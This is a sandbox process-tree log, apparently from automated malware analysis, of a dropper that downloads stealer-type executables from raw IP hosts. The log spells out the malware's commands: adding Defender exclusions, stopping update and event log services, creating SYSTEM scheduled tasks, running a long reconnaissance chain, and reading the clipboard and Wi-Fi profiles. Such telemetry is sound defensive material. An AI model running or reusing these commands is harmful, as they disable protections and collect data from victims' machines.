- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "HsFIJVFBpaOiSlL"
    3⤵
    PID:18224
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "HsFIJVFBpaOiSlL"
    3⤵
    PID:18176
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "WyOrfcWfrBamuS" /F /xml "C:\Program Files (x86)\efSuucJNImPU2\yoxvPqD.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:16736
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "kiXxoUJRQWRVF2" /F /xml "C:\ProgramData\WMmUhsrLoeNTYuVB\cRFWTLJ.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:18768
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "BLlTsguLxEDntNTLH2" /F /xml "C:\Program Files (x86)\qfQXRdAKnlsTdhGWuTR\PCvAnMc.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:21532
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "BtVMzXpXWmtubExaWQo2" /F /xml "C:\Program Files (x86)\gWMsjtYByovYC\eRQZlwN.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:19172
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ceuxZEzDPWMxlYwWu" /SC once /ST 05:07:05 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\MlEwZvbgpCGVQFZq\cOjbhYWw\tqKZVlt.dll\",#1 /UEdidw 385118" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:19660
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "ceuxZEzDPWMxlYwWu"
    3⤵
    PID:19796
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "IzaEPSfYdSgyWPrQW"
    3⤵
    PID:20124
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 13084 -s 2408
    3⤵
    - Program crash
    PID:20416
- C:\Users\Admin\AppData\Local\Temp\http185.172.128.19Newoff.exe.exe
  C:\Users\Admin\AppData\Local\Temp\http185.172.128.19Newoff.exe.exe
  2⤵
  PID:18148
- C:\Windows\system32\rundll32.EXE
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MlEwZvbgpCGVQFZq\cOjbhYWw\tqKZVlt.dll",#1 /UEdidw 385118
  2⤵
  PID:19884
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MlEwZvbgpCGVQFZq\cOjbhYWw\tqKZVlt.dll",#1 /UEdidw 385118
    3⤵
    PID:19940
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "ceuxZEzDPWMxlYwWu"
      4⤵
      PID:15496
- C:\Users\Admin\AppData\Local\Temp\http185.172.128.19Newoff.exe.exe
  C:\Users\Admin\AppData\Local\Temp\http185.172.128.19Newoff.exe.exe
  2⤵
  PID:20924
- C:\Users\Admin\AppData\Local\Temp\http185.172.128.19Newoff.exe.exe
  C:\Users\Admin\AppData\Local\Temp\http185.172.128.19Newoff.exe.exe
  2⤵
  PID:26420
- C:\Users\Admin\AppData\Local\Temp\http185.172.128.19Newoff.exe.exe
  C:\Users\Admin\AppData\Local\Temp\http185.172.128.19Newoff.exe.exe
  2⤵
  PID:39760
- C:\Users\Admin\AppData\Local\Temp\http185.172.128.19Newoff.exe.exe
  C:\Users\Admin\AppData\Local\Temp\http185.172.128.19Newoff.exe.exe
  2⤵
  PID:48908

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1476
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2176

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1556

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1688

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1812
- C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x00000000000004C0 0x00000000000004D4
  2⤵
  PID:14812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1992

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2032

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1848

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2164

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
- Drops file in System32 directory
PID:2512

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
PID:2724

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2476

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Enumerates connected drives
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
PID:3320
- C:\Users\Admin\AppData\Local\Temp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3152
- - C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4756
  - - C:\Users\Admin\AppData\Local\Temp\1621415420.exe
      C:\Users\Admin\AppData\Local\Temp\1621415420.exe
      4⤵
      Executes dropped EXE
      PID:2696
- - C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:3016
  - - C:\Windows\syslmgrsvc.exe
      C:\Windows\syslmgrsvc.exe
      4⤵
      Modifies security service
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Suspicious use of WriteProcessMemory
      PID:976
    - - C:\Users\Admin\AppData\Local\Temp\1787010459.exe
        
        C:\Users\Admin\AppData\Local\Temp\1787010459.exe
        5⤵
        Executes dropped EXE
        
        PID:1832
    - - C:\Users\Admin\AppData\Local\Temp\84855294.exe
        
        C:\Users\Admin\AppData\Local\Temp\84855294.exe
        5⤵
        Executes dropped EXE
        
        PID:4712
    - - C:\Users\Admin\AppData\Local\Temp\380533075.exe
        
        C:\Users\Admin\AppData\Local\Temp\380533075.exe
        5⤵
        Executes dropped EXE
        
        PID:1660
      - C:\Users\Admin\AppData\Local\Temp\3194226347.exe
        
        C:\Users\Admin\AppData\Local\Temp\3194226347.exe
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        
        PID:5640
    - - C:\Users\Admin\AppData\Local\Temp\393924909.exe
        
        C:\Users\Admin\AppData\Local\Temp\393924909.exe
        5⤵
        
        PID:7232
    - - C:\Users\Admin\AppData\Local\Temp\128116687.exe
        
        C:\Users\Admin\AppData\Local\Temp\128116687.exe
        5⤵
        
        PID:25564
- - C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendservices64.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendservices64.exe.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:1400
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4496
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:5816
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:5076
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:776
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:5928
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:5852
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:5320
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:4996
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:476
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:3036
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:5348
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:1496
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      PID:1048
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WindowsAutHost"
      4⤵
      Launches sc.exe
      PID:5712
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WindowsAutHost" binpath= "C:\ProgramData\WindowsServices\WindowsAutHost" start= "auto"
      4⤵
      Launches sc.exe
      PID:1760
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:6020
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WindowsAutHost"
      4⤵
      Launches sc.exe
      PID:2224
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:832
- - C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendredline123123.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendredline123123.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3288
- - C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendlumma1234.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendlumma1234.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2252
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3584
- - C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendlumma123.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendlumma123.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:3436
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3460
- - C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendjudit.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendjudit.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3156
  - - C:\Users\Admin\AppData\Local\Temp\onefile_3156_133620637789188432\stub.exe
      "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendjudit.exe.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1412
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:3476
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4712
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3004
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2540
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3384
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:576
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
        6⤵
        Views/modifies file attributes
        
        PID:2276
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
        5⤵
        
        PID:3540
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4484
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1520
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:1004
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2592
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2680
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        5⤵
        
        PID:2796
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4152
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        5⤵
        
        PID:2872
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:1444
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        5⤵
        
        PID:5016
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:4832
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        5⤵
        
        PID:3896
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:436
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:4580
      - C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        6⤵
        
        PID:5832
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        6⤵
        Collects information from the system
        Suspicious use of AdjustPrivilegeToken
        
        PID:5952
      - C:\Windows\system32\net.exe
        
        net user
        6⤵
        
        PID:2548
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        7⤵
        
        PID:5968
      - C:\Windows\system32\query.exe
        
        query user
        6⤵
        
        PID:5160
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        7⤵
        
        PID:5780
      - C:\Windows\system32\net.exe
        
        net localgroup
        6⤵
        
        PID:4640
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        7⤵
        
        PID:5928
      - C:\Windows\system32\net.exe
        
        net localgroup administrators
        6⤵
        
        PID:4708
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        7⤵
        
        PID:1888
      - C:\Windows\system32\net.exe
        
        net user guest
        6⤵
        
        PID:5460
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        7⤵
        
        PID:5620
      - C:\Windows\system32\net.exe
        
        net user administrator
        6⤵
        
        PID:3024
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        7⤵
        
        PID:5172
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        6⤵
        
        PID:2776
      - C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        6⤵
        Enumerates processes with tasklist
        
        PID:5692
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        6⤵
        Gathers network information
        
        PID:1172
      - C:\Windows\system32\ROUTE.EXE
        
        route print
        6⤵
        
        PID:2840
      - C:\Windows\system32\ARP.EXE
        
        arp -a
        6⤵
        
        PID:1084
      - C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        6⤵
        Gathers network information
        
        PID:4520
      - C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        6⤵
        Launches sc.exe
        
        PID:4320
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        6⤵
        Modifies Windows Firewall
        
        PID:5284
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        6⤵
        Modifies Windows Firewall
        
        PID:4612
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        5⤵
        
        PID:3872
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        
        PID:4980
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:5920
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5144
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:5956
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:5744
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:2776
- - C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendupd.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendupd.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2888
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:680
    - - C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        
        PID:4212
    - - C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3512
- - C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendgold.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendgold.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2700
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3476
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2700 -s 272
      4⤵
      Program crash
      PID:6084
- - C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendlrthijawd.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendlrthijawd.exe.exe"
    3⤵
    - Executes dropped EXE
    PID:2340
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
      4⤵
      PID:1840
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\work.exe
        
        work.exe -priverdD
        5⤵
        Executes dropped EXE
        
        PID:1576
      - C:\Users\Admin\AppData\Local\Temp\RarSFX1\jergs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\jergs.exe"
        6⤵
        Executes dropped EXE
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:3872
- - C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend33333.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend33333.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1616
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1924
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:484
    - - C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1472
    - - C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3284
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        5⤵
        
        PID:2188
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2184
      - C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:1120
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 304
      4⤵
      Program crash
      PID:5648
- - C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendnewbild.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendnewbild.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4764
- - C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendswizzzz.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendswizzzz.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1156
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:476
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:424
- - C:\Users\Admin\AppData\Local\Temp\http107.173.143.2820056igcc.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http107.173.143.2820056igcc.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:2696
  - - C:\Users\Admin\AppData\Local\Temp\http107.173.143.2820056igcc.exe.exe
      "C:\Users\Admin\AppData\Local\Temp\http107.173.143.2820056igcc.exe.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      PID:4388
- - C:\Users\Admin\AppData\Local\Temp\http198.23.201.89warmquote.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http198.23.201.89warmquote.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3004
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 232
      4⤵
      Program crash
      PID:5712
- - C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendbuildjudit.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendbuildjudit.exe.exe"
    3⤵
    - Executes dropped EXE
    PID:5220
  - - C:\Users\Admin\AppData\Local\Temp\onefile_5220_133620637929969569\stub.exe
      "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendbuildjudit.exe.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5620
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:5748
- - C:\Users\Admin\AppData\Local\Temp\httpstestdomain123123.shopFrameworkSurvivor.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpstestdomain123123.shopFrameworkSurvivor.exe.exe"
    3⤵
    - Executes dropped EXE
    PID:5868
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k copy Helping Helping.cmd & Helping.cmd & exit
      4⤵
      PID:5440
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5472
